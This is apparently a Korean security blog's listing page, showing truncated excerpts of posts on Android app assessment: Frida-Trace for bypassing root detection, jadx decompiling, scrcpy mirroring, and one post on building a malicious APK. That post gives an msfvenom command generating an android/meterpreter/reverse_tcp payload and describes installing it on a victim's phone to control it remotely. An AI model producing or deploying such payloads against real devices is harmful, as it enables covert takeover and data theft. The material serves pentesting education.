앱 진단 시 소스 코드를 분석함에 있어서 어디에서 어떤 클래스와 메소드가 실행되어 동작하는지 프리다 트레이스(Frida-Trace)를 이용하여 파악할 수 있는 방법이 있다. 루팅 탐지를 하는 앱에서 루팅우회할 때 유용하게 사용한다. 준비물 1. 프리다 트레이싱 .exe 동작 조건 1. 프리다 트레이서를 동작할 때 경로에 어떤 한글도 포함되면 안됨 (영어만) 2. 추적할 클래스 또는 메소드가 포함된 Smali 파일을 함께 위치해야함 3. 너무 많은 Smali파일이나 메소드를 넣으면 제대로 동작 안됨 사용 방법 먼저 진단할 앱을 디컴파일 후 경로를 복사해줌 이 때 첫번째 조건인 경로에 한글이 포함되면 안된다. 프리다 트레이싱 프로그램 실행 Frida_Tracing_v1.0.exe [Smali 파일이 있는 경..

안드로이드 진단때 필수적으로 하는 과정이 소스코드 분석이다. 소스코드 분석 시 사용하는 툴이 대표적으로 2~3가지가 있는데 Jadx, Jeb, IDA 등이 있다. jadx가 가장 포터블하게 가볍고 빠르게 소스코드 분석을 할 수 있었다. https://github.com/skylot/jadx/releases Releases · skylot/jadx Dex to Java decompiler. Contribute to skylot/jadx development by creating an account on GitHub. github.com 하지만 1.3 버전이 새로 나오면서 많은 기능이 생기고 그만큼 잡아먹는 리소스도 많아졌는데 나도 apk 디컴파일 시 메모리가 부족하다는 에러가 발생했다. ​ jadx-gui..

최근 몸캠 피싱이나 보이스 피싱과 같은 사기피해 사건이 꾸준히 늘고 있다. 뿐 만아니라 택배를 가장한 문자나 코로나와 관련된 문자로 피해자들에게 악성앱을 설치하도록 유도한뒤 데이터를 다 빼가거나 협박을하여 이득을 취한다. Tip 게시판에 적어둔 Msfvenom을 이용하여 악성앱을 제작해 리버스 쉘과 같은 원리로 동작하는 리버스 TCP 공격을 이용하여 피해자의 단말기를 제어할 수 있다. 먼저 휴대폰을 제어할 공격PC의 IP 확인 msfvenom으로 페이로드를 android로 생성하여 apk 생성 msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=포트지정 R > 암거나.apk 생성된 apk를 피해 단말기로 옮겨서 설치한다. 공격자의 PC에서는 리버스쉘과..

안드로이드 진단때 간혹 화면 캡처 방지코드가 적용되어있는 앱들이 있다. 그럴 때는 증적을 남기기위해 scrcpy 툴을 사용한다. https://github.com/Genymobile/scrcpy/releases/ Releases · Genymobile/scrcpy Display and control your Android device. Contribute to Genymobile/scrcpy development by creating an account on GitHub. github.com 압축을 푼 후 단말기를 usb로 연결한 후 scrcpy.exe를 실행하면 된다. 이 툴은 adb를 이용하여 동작하며 미러링 도구중에 가장 반응속도도 빠르고 단말기와 차이없는 레이턴시로 동작한다. 마우스 좌클릭 -> ..